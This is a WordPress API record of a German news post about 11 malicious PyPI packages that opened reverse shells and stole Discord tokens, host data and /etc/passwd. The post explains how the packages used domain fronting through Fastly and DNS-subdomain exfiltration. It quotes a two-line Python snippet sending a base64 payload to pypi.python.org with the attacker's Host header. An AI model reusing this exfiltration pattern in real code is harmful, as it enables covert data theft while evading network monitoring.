{"id":102339,"date":"2021-11-20T09:36:56","date_gmt":"2021-11-20T07:36:57","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi"},"modified":"2021-11-20T09:36:56","modified_gmt":"2021-11-20T07:36:57","slug":"v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/news\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi","title":{"rendered":"Im Katalog PyPI wurden b\u00f6sartige Bibliotheken entdeckt, die das CDN PyPI nutzen, um den Kommunikationskanal zu verbergen.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Im Katalog PyPI (Python Package Index) wurden 11 Pakete mit b\u00f6sartigem Code entdeckt. Bis zur Feststellung der Probleme wurden die Pakete insgesamt etwa 38.000 Mal heruntergeladen. Die entdeckten b\u00f6sartigen Pakete zeichnen sich durch ausgekl\u00fcgelte Methoden zur Verschleierung ihrer Kommunikationskan\u00e4le mit den Servern der Angreifer aus.     <\/p>\n<ul>\n<li class=\"l\"> importantpackage (6305 Downloads), important-package (12897) \u2014 stellte eine Verbindung zu einem externen Server her, indem es sich als Verbindung zu pypi.python.org ausgab, um Shell-Zugriff auf das System (Reverse-Shell) bereitzustellen und nutzte daf\u00fcr das Programm trevorc2 zur Tarnung des Kommunikationskanals.\n<li class=\"l\"> pptest (10001), ipboards (946) \u2014 verwendeten DNS als Kommunikationskanal zur \u00dcbertragung von Systeminformationen (im ersten Paket den Hostnamen, das Arbeitsverzeichnis, interne und externe IPs, im zweiten \u2014 den Benutzernamen und Hostnamen).\n<li class=\"l\"> owlmoon (3285), DiscordSafety (557), yiffparty (1859) \u2014 identifizierten im System das Token des Discord-Dienstes und sendeten es an einen externen Host.\n<li class=\"l\"> trrfab (287) \u2014 sendete eine ID, den Hostnamen und den Inhalt von \/etc\/passwd, \/etc\/hosts, \/home an einen externen Host.\n<li class=\"l\"> 10Cent10 (490) \u2014 stellte eine Reverse-Shell-Verbindung zu einem externen Host her.\n<li class=\"l\"> yandex-yt (4183) \u2014 gab eine Mitteilung \u00fcber die Kompromittierung des Systems aus und leitete auf eine Seite mit zus\u00e4tzlichen Informationen zu den weiteren Schritten, bereitgestellt \u00fcber nda.ya.ru (api.ya.cc), weiter.  <\/ul>\n<p>Besondere Aufmerksamkeit verdient die Methode zur Kontaktaufnahme mit externen Hosts, die in den Paketen importantpackage und important-package verwendet wurde, die zur Tarnung ihrer Aktivit\u00e4ten das Content Delivery Network Fastly nutzen, das im Verzeichnis PyPI eingesetzt wird. Tats\u00e4chlich wurden die Anfragen an den Server pypi.python.org gesendet (unter Angabe des Namens python.org im SNI innerhalb der HTTPS-Anfrage), wobei jedoch im HTTP-Header 'Host' der Name des dem Angreifer unterstehenden Servers (sec.forward.io.global.prod.fastly.net) eingetragen wurde. Das Content Delivery Network leitete eine solche Anfrage an den Server der Angreifer weiter, indem es die TLS-Verbindungsparameter mit pypi.python.org verwendete.       <\/p>\n<p>Die Infrastruktur von PyPI wird mit Hilfe des Content Delivery Networks Fastly bereitgestellt, in dem transparente Varnish-Proxies zum Caching typischer Anfragen verwendet werden und die Verarbeitung von TLS-Zertifikaten auf der Ebene des CDN und nicht der Endserver erfolgt, um die Weiterleitung von HTTPS-Anfragen \u00fcber den Proxy zu organisieren. Unabh\u00e4ngig vom Zielhost werden die Anfragen an den Proxy geleitet, der den notwendigen Host anhand des HTTP-Headers 'Host' bestimmt. <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/domain\/\"   title=\"Domainnamen\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"934\">Domainnamen<\/a> Hosts werden an die standardisierten IP-Adressen der Fastly CDN-Lastverteilungsserver gebunden, die f\u00fcr alle Kunden gelten.      <\/p>\n<p>Der Angreifer-Server wird ebenfalls im CDN Fastly registriert, das allen Interessierten kostenlose Tarife anbietet und sogar anonyme Registrierungen zul\u00e4sst. Interessanterweise wird auch f\u00fcr das Senden von Anfragen an das Opfer bei der Erstellung eines \"Reverse Shell\" das gleiche Schema verwendet, jedoch initiiert von der Seite des angreifenden Hosts. Die Interaktion mit dem Angreifer-Server erscheint aus der Sicht wie eine legitime Sitzung mit dem PyPI-Verzeichnis, verschl\u00fcsselt unter Verwendung von <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/ssl-sertifikat\/\"   title=\"TLS-Zertifikat\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"951\">TLS-Zertifikat<\/a> PyPI. Diese Technik, bekannt als \"Domain Fronting\", wurde fr\u00fcher aktiv verwendet, um den Hostnamen zu verbergen und Blockaden zu umgehen, indem die M\u00f6glichkeit genutzt wurde, \u00fcber HTTPS mit einer SNI eines fiktiven Hosts und der tats\u00e4chlichen \u00dcbertragung des angeforderten Hostnamens im HTTP-Header Host innerhalb der TLS-Sitzung auf einige CDN-Netzwerke zuzugreifen.     <center><img decoding=\"async\" alt=\"Im Katalog PyPI wurden b\u00f6sartige Bibliotheken entdeckt, die das CDN PyPI nutzen, um den Kommunikationskanal zu verbergen. \" src=\"\/wp-content\/uploads\/2021\/11\/9e9761458829291aded542d2bcae4cf3.jpg\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>Zur Verschleierung sch\u00e4dlicher Aktivit\u00e4ten wurde zus\u00e4tzlich das Paket TrevorC2 eingesetzt, das die Interaktion mit dem Server so aussehen l\u00e4sst wie gew\u00f6hnliches Web-Browsing; beispielsweise wurden sch\u00e4dliche Anfragen als Bilddownload \"https:\/\/pypi.python.org\/images\/guid=\" getarnt, wobei die Informationen im Parameter guid codiert waren.           url = \"https:\/\/pypi.python.org\" + \"\/images\" + \"?\" + \"guid=\" + b64_payload     r = request.Request(url, headers = {'Host': \"psec.forward.io.global.prod.fastly.net\"})      <\/p>\n<p>In den Paketen pptest und ipboards wurde ein anderer Ansatz zur Verschleierung der Netzwerkaktivit\u00e4ten verwendet, der auf der Codierung n\u00fctzlicher Informationen in Anfragen an den DNS-Server basiert. Die Malware \u00fcbertr\u00e4gt Informationen, indem sie DNS-Anfragen wie \"nu4timjagq4fimbuhe.example.com\" ausf\u00fchrt, wobei die zu \u00fcbertragenden Daten im Subdomain-Namen im base64-Format codiert sind. Der Angreifer erh\u00e4lt die Nachrichteninformationen, indem er den DNS-Server f\u00fcr die Domain example.com kontrolliert.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=56190\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI (Python Package Index) \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e 11 \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434. \u0414\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0441\u0443\u043c\u043c\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e 38 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437. \u0412\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u043c\u044b\u0441\u043b\u043e\u0432\u0430\u0442\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432. importantpackage (6305 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a), important-package (12897) &#8212; \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 \u0432\u043d\u0435\u0448\u043d\u0438\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u043f\u043e\u0434 \u0432\u0438\u0434\u043e\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a pypi.python.org \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":102340,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-102339","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI (Python Package Index) \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e 11 \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434. \u0414\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0441\u0443\u043c\u043c\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e 38 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/news\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 CDN PyPI \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u0430\u043d\u0430\u043b\u0430 \u0441\u0432\u044f\u0437\u0438 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI (Python Package Index) \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e 11 \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434. \u0414\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0441\u0443\u043c\u043c\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e 38 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/news\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-11-20T07:36:57+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2021-11-20T07:36:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47 Im PyPI-Verzeichnis wurden sch\u00e4dliche Bibliotheken identifiziert, die das CDN PyPI zur Verschleierung des Kommunikationskanals verwenden | ProHoster","description":"Im PyPI-Verzeichnis (Python Package Index) wurden 11 Pakete identifiziert, die sch\u00e4dlichen Code enthalten. Bis zur Entdeckung der Probleme wurden die Pakete insgesamt etwa 38.000 Mal heruntergeladen.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/news\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 CDN PyPI \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u0430\u043d\u0430\u043b\u0430 \u0441\u0432\u044f\u0437\u0438 | ProHoster","og:description":"\u0412 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 PyPI (Python Package Index) \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e 11 \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434. \u0414\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0441\u0443\u043c\u043c\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e 38 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437.","og:url":"https:\/\/prohoster.info\/de\/blog\/news\/v-kataloge-pypi-vyyavleny-vredonosnye-biblioteki-ispolzuyushhie-cdn-pypi-dlya-skrytiya-kanala-svyazi","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-11-20T07:36:57+00:00","article:modified_time":"2021-11-20T07:36:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"102339","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-11-20 07:37:34","updated":"2026-02-08 21:02:57","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/102339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=102339"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/102339\/revisions"}],"predecessor-version":[{"id":158143,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/102339\/revisions\/158143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media\/102340"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=102339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=102339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=102339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}